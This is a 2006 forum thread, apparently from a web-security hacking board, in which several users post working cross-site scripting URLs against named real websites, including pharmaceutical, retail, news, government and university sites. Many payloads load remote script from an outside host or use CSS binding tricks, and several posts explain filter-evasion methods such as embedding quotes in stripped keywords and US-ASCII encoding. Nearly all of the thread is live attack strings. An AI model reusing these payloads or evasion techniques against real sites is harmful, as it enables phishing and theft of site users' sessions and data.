http://www.merck.com/mrksearch/SearchServlet?HeaderImage=&HeaderImageAlt=&qt=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

http://search.lilly.com/search_result.jsp?QueryText=%22%3E%3Cscript%20src=http://ha.ckers.org/xss.js%20&query=natural&MaxDocs=50&ResultCount=10&QueryStartYear=Year&scope=lilly&scope=&ResultStart=1&ViewTemplate=docread.jsp&sectionName=Search&Coll=&adv=Y&Summaries=1&Sortspec=Score&Order=asc&QueryStartMonth=01&QueryEndMonth=12&QueryEndYear=Year

- RSnake
Gotta love it. http://ha.ckers.org

http://www.sogou.com/sohu?query=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&pid=sohu&rid=01001400&md=listTopics&name=%22%3Easdf&mode=0&sogouhome=&shuru=shou

- RSnake
Gotta love it. http://ha.ckers.org

http://search.espn.go.com/keyword/search?searchString=%3C/title%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E&Find.x=0&Find.y=0

- RSnake
Gotta love it. http://ha.ckers.org

https://www.adwaresystems.com/AdClock6/servlet.Login?CURRENTPAGE=Login.jsp&LOGINPAGENAME=Login.jsp&command=logon&user=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&password=

- RSnake
Gotta love it. http://ha.ckers.org

Love their campaign - Anti-spyware, anti-virus, anti-popups, but what about the anti-XSS? Killing quotes just doesn't cut it. http://search.earthlink.net/search?area=earthlink-ss&q=%3C/title%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E&channel=www&cgid=1&li=0

- RSnake
Gotta love it. http://ha.ckers.org

This is one of the hardest ones I've come accross in a while: http://www.costco.com/Common/Search.aspx?whse=BC&topnav=&search=%3C%27/script%3E%3C%27script%3Ealert%28%22XSS%22%29%3C%27/script%3E&N=0&Ntt=%3C%27/script%3E%3C%27script%3Ealert%28%22XSS%22%29%3C%27/script%3E&cm_re=1-_-Top_Left_Nav-_-Top_search

Basically they don't allow certain things (keywords) like <script> etc... which we can get around in certain ways, but it also encapsulates things in single quotes too. Eesh... But jumping out of single quotes isn't possible because they remove them! So... what if we embed single quotes inside the keywords that they remove. Aha! They remove the single quotes and leave the keywords, so I can jump out of the JavaScript with an end <'/script> tag which gets turned into </script> and by following that up by a <'script>alert("XSS")<'/script> which gets turned into a <script>alert("XSS")</script> tag we have our working vector. Whew! I thought I was loosing it there for a minute. Cross site scripting is an art as much as it is a science.

- RSnake
Gotta love it. http://ha.ckers.org

Much as writing sentences that arn't run-on is an art...

/zing!

-id

Wow, you got me there, ouch. Meanwhile, back to the pwnage:

http://giftregistry.kmart.com/webapp/wcs/stores/servlet/GiftRegistrySearchResultsView?storeId=10151&catalogId=10051&maxResultsPerPage=10&maxResults=50&sortBy=4&startIndex=0&findSimilarMatches=&searchOtherRegistry=true&firstName=%22%3E%3CIMG%20SRC=%22%22%20onerror=alert(%22XSS%22)%3E&lastName=blah&externalId=

If you enter in <script> it gives you a nice little error message about the servers thinking your request is malicious. No, it's informational only. Malicious would be using it to phish people. Silly computers.

- RSnake
Gotta love it. http://ha.ckers.org

http://www.michaels.com/art/online/search?pageNumber=1&channel=0&search=yes&keywords=--%3E%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&type=0&x=0&y=0

Another interesting one where I had to jump out of the comment to end the script tag. People who write well formed JavaScript are a rare breed these days. I almost forgot what it's really supposed to look like (minus my vector of course):

<script language="javascript1.1">
<!--
var cm = new _cm("tid", "1", "vn2", "e3.1");
cm.pi = getFileNameFromURL();
cm.se = "--></script><script>alert(String.fromCharCode(88,83,83))</script>";
cm.writeImg();
//-->
</script>

- RSnake
Gotta love it. http://ha.ckers.org

I'm at the bar, pretty drunk by now, trying to fix fthe and make irc secure, I get to be inchoherent.

-id

What's your excuse the rest of the time?

/zing!

- RSnake
Gotta love it. http://ha.ckers.org

Oh btw, why doesn't this work?

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://giftregistry.kmart.com/webapp/wcs/stores/servlet/GiftRegistrySearchResultsView&storeId=10151&catalogId=10051&externalId=%22%3E%3CBODY%20onLoad%3D%22alert('xss')%22%3E

- Kyran

I think it's because the onload event handler for the body tag is defined above. There is some really crazy (poor) HTML on that page, it's tough to tell.

- RSnake
Gotta love it. http://ha.ckers.org

well the first (maybe not only) problem is that their already is an onload event.

<body onload="fnSetFocus();">

You can't inject <body onload="alert(1)"> and overwrite any existing onload events sadly :/

-maluc

http://search.ft.com/searchResults?queryText=%22));alert(%22XSS%22);//&x=0&y=0&javascriptEnabled=true

- RSnake
Gotta love it. http://ha.ckers.org

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://tmc.tippingpoint.com/TMC/SendUserName&emailaddress=1%3Cscript%3Ealert('xss')%3C/script%3E <- TippingPoint via POST. Ouch.

- Kyran

Serious pain in the ass on this one as no open angle brackets were allowed. Had to inject it into the DoubleClick code output. Then the huge mess of characters at the beginning are to get it to error out to this page. I'm sure there are easier places to inject XSS into on this site, but once I got started there was no turning back: http://www.marketwatch.com/tools/quotes/quotes.asp?symb=blablablahasdaslkdfjlkasjdfasdlkfjlaksjdflkjaslkdfjkajsdhfkjhaskjdfhkjashdfkjhkajshdfsd%22%3E%5Cu003C/iframe%5Cu003E%5Cu003Cscript%20src=http://ha.ckers.org/xss.js%3E%22);//

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 11/05/2006 12:41AM by rsnake.

https://www.girlsgonewild.com/index.cfm?action=checkout.cartprocess&quantity_mode=absolute&item_mode_upsell=&item_code_upsell=&item_quantity_upsell=&OCcode=&shipping_option_id=2&Salutation=-----&firstname=&lastname=&email=&shipping_phone_areacode=&shipping_phone_prefix=&shipping_phone_linenumber=&shipping_address1=%22%3E%3Cscript%3Ealert(%22HaX0rz%20gone%20wild%22)%3C/script%3E&shipping_address2=&shipping_city=&shipping_state=&shipping_zip=&shipping_country_code=US&save=CHECK+OUT

- RSnake
Gotta love it. http://ha.ckers.org

http://www.marketwatch.com/news/story/Story.aspx?guid=%7BB98F74D2%2DF404%2D4A56%2DBE84%2D85889FB20976%7D&siteid=asdf%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss'%29 too.. and you probably could've used style injection there too? that's one ugly looking vector ^^

be warned: that popped up 72 alert boxes for me.. i'm not exaggerating.

-maluc



Edited 1 time(s). Last edit at 11/05/2006 01:18AM by maluc.

http://www.marketwatch.com/support/feedback.asp?siteid=asdf%22;alert(%22XSS%22);e=%22

3popups

-maluc

IE only, using USASCII encoding injection
http://search.hhs.gov/search?q=asdf%A2%BE%BCscript%BEalert(%A2XSS%A2)%BC/script%BE%BCx&Submit=Search&ie=&site=HHS&output=xml_no_dtd&client=HHS&lr=&proxystylesheet=HHS&oe=US-ASCII

normal
http://search.hhs.gov/search?output=xml&proxystylesheet=HHS%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Nice job on the US-ASCII encoding one. That's exactly what I was talking about in my blog post the other day.

- RSnake
Gotta love it. http://ha.ckers.org

indeed, it was a timely post ^^

either that or they're more common than i realize.. stumbled upon it without trying

-maluc

http://www.demonoid.com/redirect.php?url='><script>alert('Torrents%20are%20bad');</script>

- Kyran

http://www.animelyrics.tv/subscribe.asp?name=applesauce&email=asdf%3Cscript%3Ealert%28%22You+have+XSS+here%22%29%3C%2Fscript%3E

it gets added to their mailing list.. so try not to click it too much :x

-maluc

university list:

http://whitepages.med.harvard.edu/WhitePagesPublic.asp?task=mysearch&db=hms&Last_Name=%22%3E%3Cscript%3Ealert(%22Go%20To%20Stanford%22)%3C/script%3E%3Cx
http://stanfordwho.stanford.edu/lookup?search=qwer%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%3Bxx:expression(alert('XSS'))&submit=Search
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://cypress.csuchico.edu/APO/WebDocs/Directory/LookupLocation.asp&Building=25MST&Room=here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E cypress.csuchico.edu
http://www.cornell.edu/print.cfm?page=http://www.google.com/local_url?q=http://maluc.sitesled.com/xss.html whitelisting google + a google open redirect = open proxy.
https://utdirect.utexas.edu/nlogon/vip/ogif.WBX?referring_url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20e=%22 seems to not load sometimes.. might be inadvertantly Dosing it or it's IPS hates me.
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://map.ais.ucla.edu/portal/site/UCLA/menuitem.cfbd3d7d013be6a5ec9b87105d66344a/%3fjavax.portlet.tpst=414a0e597bcc1105313b8c105d66344a_ws_MX&javax.portlet.prp_414a0e597bcc1105313b8c105d66344a_viewID=RESULT_SET_VIEW&javax.portlet.begCacheTok=token&javax.portlet.endCacheTok=token&eng=autonomyUCLA&qt=asdf%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&Submit.x=0&Submit.y=0&Submit=Search map.ais.ucla.edu
https://www1.baylor.edu/courselistings/ListCourses.aspx?Level=college&Term_CC=20&Term=035&TermDesc=2003_-_Wintasdf%22style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%22%20x=
http://web.mit.edu/bin/cgicso?query=--%3E%3Cscript%3Ealert(%22Go%20to%20harvard%22)%3C/script%3E%3C!--x
https://kb.berkeley.edu/cgi-bin/help_referral.pl?articleTitle=%3Cscript%3Ealert(%22Go%20to%20MIT%22)%3C/script%3E%3Cx
http://search.caltech.edu/search?q=grandma%20porn!%3Cscript%3Ealert(%22Go%20to%20Berkeley%22)%3C/script%3E&site=Caltechweb&output=xml_no_dtd&client=Caltechweb&proxystylesheet=Caltechweb
http://www.googlesyndicatedsearch.com/u/PrincetonNew?q=%22%3E%3Cscript%3Ealert(%22Go%20to%20UT%22)%3C/script%3E%3Cx not actually princeton's domain, but could be of some use

-maluc



Edited 10 time(s). Last edit at 11/07/2006 07:54AM by maluc.

http://www.alsa.org/print.cfm?title=%3C/title%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&URL=alsa%2Fleaders.cfm%3F%3Cscript%3Ealert(String.fromCharCode(88,83,83,50))%3C/script%3E
http://www.cast.org/teachingeverystudent/ideas/print.cfm?name=Uh%20Oh%3Cscript%3Ealert(%22Uh%20Oh%22)%3C/script%3E&r_id=-1

-maluc



Edited 1 time(s). Last edit at 11/07/2006 06:20AM by maluc.

http://www.furl.net/urlInfo.jsp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx

-maluc

http://www.texassports.com/index.php?s=asdf%22%3E%3Cscript%3Ealert(%22A%20lot%20of%20alerts..%22)%3C/script%3E%3Cx&change_well_id=2&url_article_id=2406

56 alerts by my count..

-maluc